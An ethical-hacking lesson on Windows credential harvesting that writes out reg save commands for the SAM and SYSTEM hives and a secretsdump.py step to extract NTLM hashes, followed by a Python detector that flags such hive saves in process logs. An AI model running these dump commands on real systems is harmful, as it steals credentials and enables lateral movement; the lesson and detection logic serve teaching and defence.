Ethical Hacking Academy · Lesson

Credential Harvesting

Dump secrets.

Why Harvest Credentials?

Even after reaching SYSTEM, the real prize is often credentials — password hashes, plaintext passwords, and tickets that let you move laterally and reach the domain. Credential harvesting turns one box into the whole network.

The SAM Database

Local account hashes live in the SAM registry hive, encrypted with a key in the SYSTEM hive. With SYSTEM access you can dump both and extract NTLM hashes offline.

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
# then: secretsdump.py -sam sam.save -system system.save LOCAL
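From the detection side, the two `reg save` commands above are a strong signal because hash recovery needs both hives. The following is an added example, not part of the original lesson: it scans process-creation command lines and raises severity when one host saves SAM and SYSTEM close together. The event tuple layout, host names and user names are constructed for illustration, and the sketch assumes command-line logging is available (for example Sysmon Event ID 1 or Security Event ID 4688).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches reg.exe saving a sensitive hive; accepts HKLM or HKEY_LOCAL_MACHINE.
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?"?\s+save\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SYSTEM)\b',
    re.IGNORECASE,
)

# Constructed sample events (assumed layout): (timestamp, host, user, command line).
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:05", "WS01", "alice", r"reg query HKLM\SOFTWARE\Microsoft"),
    ("2024-05-01T10:02:11", "WS02", "svc_web", r"reg save HKLM\SAM sam.save"),
    ("2024-05-01T10:02:40", "WS02", "svc_web", r"reg.exe save hklm\system system.save"),
    ("2024-05-01T11:15:00", "WS03", "backup", r"reg save HKLM\SYSTEM D:\bk\system.hiv"),
    ("2024-05-01T12:00:00", "WS04", "bob", r"reg save HKLM\SOFTWARE soft.save"),
]

def detect_hive_dumps(events, window=timedelta(minutes=10)):
    """Return one alert per host: 'high' when the host saves both SAM and SYSTEM
    within `window` (the pair needed to recover hashes), else 'medium'."""
    per_host = defaultdict(list)
    for ts, host, user, cmd in events:
        m = HIVE_SAVE.search(cmd)
        if m:
            per_host[host].append((datetime.fromisoformat(ts), m.group(1).upper(), user))
    alerts = []
    for host, hits in sorted(per_host.items()):
        sam = [t for t, hive, _ in hits if hive == "SAM"]
        system = [t for t, hive, _ in hits if hive == "SYSTEM"]
        # Pairing check: any SAM save and SYSTEM save close together in time.
        paired = any(abs(a - b) <= window for a in sam for b in system)
        alerts.append({
            "host": host,
            "severity": "high" if paired else "medium",
            "hives": sorted({hive for _, hive, _ in hits}),
            "users": sorted({u for _, _, u in hits}),
        })
    return alerts

if __name__ == "__main__":
    for alert in detect_hive_dumps(SAMPLE_EVENTS):
        print(alert)
```

A single SYSTEM save, as on the constructed backup host, stays at medium so it can be triaged against known backup jobs rather than paged on.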
